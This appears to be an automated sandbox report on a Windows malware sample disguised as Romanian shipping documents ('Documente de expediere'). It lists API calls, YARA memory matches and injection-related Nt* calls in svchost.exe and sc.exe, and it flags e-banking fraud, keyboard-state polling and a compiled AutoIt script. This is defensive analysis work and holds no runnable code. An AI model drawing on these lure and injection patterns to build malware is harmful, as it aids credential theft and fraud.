0_2_00D56B0C

Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe

Code function: 0_2_00D56D07 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_00D56D07

Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe

0_2_00D56B0C

Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe

Code function: 0_2_00D42B37 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,

0_2_00D42B37

Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe

Code function: 0_2_00D6F7FF DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

0_2_00D6F7FF

E-Banking Fraud

Binary is likely a compiled AutoIt script file

Source: Yara match	File source: 1.2.svchost.exe.4e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.4e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.2914944914.00000000008A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2916379942.0000000002F90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2248534012.0000000002F90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2248246717.00000000004E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2915999242.0000000001630000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2916441443.0000000002FE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2248900268.0000000003D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2916213463.0000000003560000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

System Summary

Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: This is a third-party compiled AutoIt script.	0_2_00D03D19
Source: AWB_5771388044 Documente de expediere.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: AWB_5771388044 Documente de expediere.exe, 00000000.00000002.1667221771.0000000000DAE000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_720f6ea4-1
Source: AWB_5771388044 Documente de expediere.exe, 00000000.00000002.1667221771.0000000000DAE000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_399bdd86-f
Source: AWB_5771388044 Documente de expediere.exe	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_14974602-3
Source: AWB_5771388044 Documente de expediere.exe	String found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_719f95ea-d

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: AWB_5771388044 Documente de expediere.exe

Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0050CDA3 NtClose,	1_2_0050CDA3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03072B60 NtClose,LdrInitializeThunk,	1_2_03072B60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03072DF0 NtQuerySystemInformation,LdrInitializeThunk,	1_2_03072DF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030735C0 NtCreateMutant,LdrInitializeThunk,	1_2_030735C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03074340 NtSetContextThread,	1_2_03074340
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03074650 NtSuspendThread,	1_2_03074650
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03072B80 NtQueryInformationFile,	1_2_03072B80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03072BA0 NtEnumerateValueKey,	1_2_03072BA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03072BE0 NtQueryValueKey,	1_2_03072BE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03072BF0 NtAllocateVirtualMemory,	1_2_03072BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03072AB0 NtWaitForSingleObject,	1_2_03072AB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03072AD0 NtReadFile,	1_2_03072AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03072AF0 NtWriteFile,	1_2_03072AF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03072F30 NtCreateSection,	1_2_03072F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03072F60 NtCreateProcessEx,	1_2_03072F60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03072F90 NtProtectVirtualMemory,	1_2_03072F90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03072FA0 NtQuerySection,	1_2_03072FA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03072FB0 NtResumeThread,	1_2_03072FB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03072FE0 NtCreateFile,	1_2_03072FE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03072E30 NtWriteVirtualMemory,	1_2_03072E30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03072E80 NtReadVirtualMemory,	1_2_03072E80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03072EA0 NtAdjustPrivilegesToken,	1_2_03072EA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03072EE0 NtQueueApcThread,	1_2_03072EE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03072D00 NtSetInformationFile,	1_2_03072D00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03072D10 NtMapViewOfSection,	1_2_03072D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03072D30 NtUnmapViewOfSection,	1_2_03072D30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03072DB0 NtEnumerateKey,	1_2_03072DB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03072DD0 NtDelayExecution,	1_2_03072DD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03072C00 NtQueryInformationProcess,	1_2_03072C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03072C60 NtCreateKey,	1_2_03072C60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03072C70 NtFreeVirtualMemory,	1_2_03072C70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03072CA0 NtQueryInformationToken,	1_2_03072CA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03072CC0 NtQueryVirtualMemory,	1_2_03072CC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03072CF0 NtOpenProcess,	1_2_03072CF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03073010 NtOpenDirectoryObject,	1_2_03073010
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03073090 NtSetValueKey,	1_2_03073090
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030739B0 NtGetContextThread,	1_2_030739B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03073D10 NtOpenProcessToken,	1_2_03073D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03073D70 NtOpenThread,	1_2_03073D70
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_03284340 NtSetContextThread,LdrInitializeThunk,	6_2_03284340
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_03284650 NtSuspendThread,LdrInitializeThunk,	6_2_03284650
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_03282B60 NtClose,LdrInitializeThunk,	6_2_03282B60
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_03282BA0 NtEnumerateValueKey,LdrInitializeThunk,	6_2_03282BA0
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_03282BE0 NtQueryValueKey,LdrInitializeThunk,	6_2_03282BE0
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_03282BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	6_2_03282BF0
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_03282AF0 NtWriteFile,LdrInitializeThunk,	6_2_03282AF0
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_03282AD0 NtReadFile,LdrInitializeThunk,	6_2_03282AD0
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_03282F30 NtCreateSection,LdrInitializeThunk,	6_2_03282F30
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_03282FB0 NtResumeThread,LdrInitializeThunk,	6_2_03282FB0
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_03282FE0 NtCreateFile,LdrInitializeThunk,	6_2_03282FE0
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_03282E80 NtReadVirtualMemory,LdrInitializeThunk,	6_2_03282E80
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_03282EE0 NtQueueApcThread,LdrInitializeThunk,	6_2_03282EE0
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_03282D30 NtUnmapViewOfSection,LdrInitializeThunk,	6_2_03282D30
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_03282D10 NtMapViewOfSection,LdrInitializeThunk,	6_2_03282D10
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_03282DF0 NtQuerySystemInformation,LdrInitializeThunk,	6_2_03282DF0
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_03282DD0 NtDelayExecution,LdrInitializeThunk,	6_2_03282DD0
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_03282C60 NtCreateKey,LdrInitializeThunk,	6_2_03282C60
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_03282C70 NtFreeVirtualMemory,LdrInitializeThunk,	6_2_03282C70
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_03282CA0 NtQueryInformationToken,LdrInitializeThunk,	6_2_03282CA0
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_032835C0 NtCreateMutant,LdrInitializeThunk,	6_2_032835C0
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_032839B0 NtGetContextThread,LdrInitializeThunk,	6_2_032839B0
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_03282B80 NtQueryInformationFile,	6_2_03282B80
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_03282AB0 NtWaitForSingleObject,	6_2_03282AB0
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_03282F60 NtCreateProcessEx,	6_2_03282F60
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_03282FA0 NtQuerySection,	6_2_03282FA0
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_03282F90 NtProtectVirtualMemory,	6_2_03282F90
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_03282E30 NtWriteVirtualMemory,	6_2_03282E30
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_03282EA0 NtAdjustPrivilegesToken,	6_2_03282EA0
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_03282D00 NtSetInformationFile,	6_2_03282D00
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_03282DB0 NtEnumerateKey,	6_2_03282DB0
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_03282C00 NtQueryInformationProcess,	6_2_03282C00
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_03282CF0 NtOpenProcess,	6_2_03282CF0
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_03282CC0 NtQueryVirtualMemory,	6_2_03282CC0
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_03283010 NtOpenDirectoryObject,	6_2_03283010
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_03283090 NtSetValueKey,	6_2_03283090
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_03283D10 NtOpenProcessToken,	6_2_03283D10
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_03283D70 NtOpenThread,	6_2_03283D70
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_008C9640 NtCreateFile,	6_2_008C9640
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_008C97B0 NtReadFile,	6_2_008C97B0
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_008C98B0 NtDeleteFile,	6_2_008C98B0
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_008C9960 NtClose,	6_2_008C9960
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_008C9AC0 NtAllocateVirtualMemory,	6_2_008C9AC0

Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe

Code function: 0_2_00D46685: CreateFileW,DeviceIoControl,CloseHandle,

0_2_00D46685

Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe

Code function: 0_2_00D3ACC5 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

0_2_00D3ACC5

Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe

Code function: 0_2_00D479D3 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

0_2_00D479D3

Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: 0_2_00D2B043	0_2_00D2B043
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: 0_2_00D3410F	0_2_00D3410F
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: 0_2_00D202A4	0_2_00D202A4
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: 0_2_00D3038E	0_2_00D3038E
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: 0_2_00D0E3B0	0_2_00D0E3B0
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: 0_2_00D206D9	0_2_00D206D9
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: 0_2_00D3467F	0_2_00D3467F
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: 0_2_00D6AACE	0_2_00D6AACE
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: 0_2_00D34BEF	0_2_00D34BEF
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: 0_2_00D2CCC1	0_2_00D2CCC1
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: 0_2_00D0AF50	0_2_00D0AF50
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: 0_2_00D06F07	0_2_00D06F07
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: 0_2_00D631BC	0_2_00D631BC
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: 0_2_00D2D1B9	0_2_00D2D1B9
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: 0_2_00D1B11F	0_2_00D1B11F
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: 0_2_00D3724D	0_2_00D3724D
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: 0_2_00D13200	0_2_00D13200
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: 0_2_00D2123A	0_2_00D2123A
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: 0_2_00D413CA	0_2_00D413CA
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: 0_2_00D093F0	0_2_00D093F0
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: 0_2_00D1F563	0_2_00D1F563
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: 0_2_00D096C0	0_2_00D096C0
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: 0_2_00D4B6CC	0_2_00D4B6CC
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: 0_2_00D6F7FF	0_2_00D6F7FF
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: 0_2_00D077B0	0_2_00D077B0
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: 0_2_00D379C9	0_2_00D379C9
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: 0_2_00D1FA57	0_2_00D1FA57
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: 0_2_00D13B70	0_2_00D13B70
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: 0_2_00D09B60	0_2_00D09B60
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: 0_2_00D07D19	0_2_00D07D19
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: 0_2_00D29ED0	0_2_00D29ED0
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: 0_2_00D1FE6F	0_2_00D1FE6F
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: 0_2_00D07FA3	0_2_00D07FA3
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: 0_2_01767E90	0_2_01767E90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004F8C13	1_2_004F8C13
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004E3190	1_2_004E3190
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0050F3C3	1_2_0050F3C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004F0403	1_2_004F0403
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004F6E13	1_2_004F6E13
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004EE613	1_2_004EE613
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004F0623	1_2_004F0623
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004EE75F	1_2_004EE75F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004EE757	1_2_004EE757
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004EE763	1_2_004EE763
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004E27D0	1_2_004E27D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030FA352	1_2_030FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0304E3F0	1_2_0304E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031003E6	1_2_031003E6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030E0274	1_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030C02C0	1_2_030C02C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03030100	1_2_03030100
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030DA118	1_2_030DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030C8158	1_2_030C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030F41A2	1_2_030F41A2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031001AA	1_2_031001AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030F81CC	1_2_030F81CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030D2000	1_2_030D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03064750	1_2_03064750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03040770	1_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0303C7C0	1_2_0303C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0305C6E0	1_2_0305C6E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03040535	1_2_03040535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03100591	1_2_03100591
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030E4420	1_2_030E4420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030F2446	1_2_030F2446
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030EE4F6	1_2_030EE4F6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030FAB40	1_2_030FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030F6BD7	1_2_030F6BD7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0303EA80	1_2_0303EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03056962	1_2_03056962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030429A0	1_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0310A9A6	1_2_0310A9A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0304A840	1_2_0304A840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03042840	1_2_03042840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030268B8	1_2_030268B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306E8F0	1_2_0306E8F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03082F28	1_2_03082F28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03060F30	1_2_03060F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030E2F30	1_2_030E2F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B4F40	1_2_030B4F40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030BEFA0	1_2_030BEFA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03032FC8	1_2_03032FC8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030FEE26	1_2_030FEE26
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03040E59	1_2_03040E59
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03052E90	1_2_03052E90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030FCE93	1_2_030FCE93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030FEEDB	1_2_030FEEDB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0304AD00	1_2_0304AD00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030DCD1F	1_2_030DCD1F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03058DBF	1_2_03058DBF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0303ADE0	1_2_0303ADE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03040C00	1_2_03040C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030E0CB5	1_2_030E0CB5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03030CF2	1_2_03030CF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030F132D	1_2_030F132D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302D34C	1_2_0302D34C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0308739A	1_2_0308739A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030452A0	1_2_030452A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0305B2C0	1_2_0305B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030E12ED	1_2_030E12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0305D2F0	1_2_0305D2F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0307516C	1_2_0307516C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302F172	1_2_0302F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0310B16B	1_2_0310B16B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0304B1B0	1_2_0304B1B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030EF0CC	1_2_030EF0CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030470C0	1_2_030470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030F70E9	1_2_030F70E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030FF0E0	1_2_030FF0E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030FF7B0	1_2_030FF7B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030F16CC	1_2_030F16CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030F7571	1_2_030F7571
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030DD5B0	1_2_030DD5B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030FF43F	1_2_030FF43F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03031460	1_2_03031460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030FFB76	1_2_030FFB76
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0305FB80	1_2_0305FB80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B5BF0	1_2_030B5BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0307DBF9	1_2_0307DBF9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030FFA49	1_2_030FFA49
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030F7A46	1_2_030F7A46
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B3A6C	1_2_030B3A6C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030DDAAC	1_2_030DDAAC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03085AA0	1_2_03085AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030E1AA3	1_2_030E1AA3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030EDAC6	1_2_030EDAC6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030D5910	1_2_030D5910
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03049950	1_2_03049950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0305B950	1_2_0305B950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030AD800	1_2_030AD800
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030438E0	1_2_030438E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030FFF09	1_2_030FFF09
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03041F92	1_2_03041F92
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030FFFB1	1_2_030FFFB1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03049EB0	1_2_03049EB0
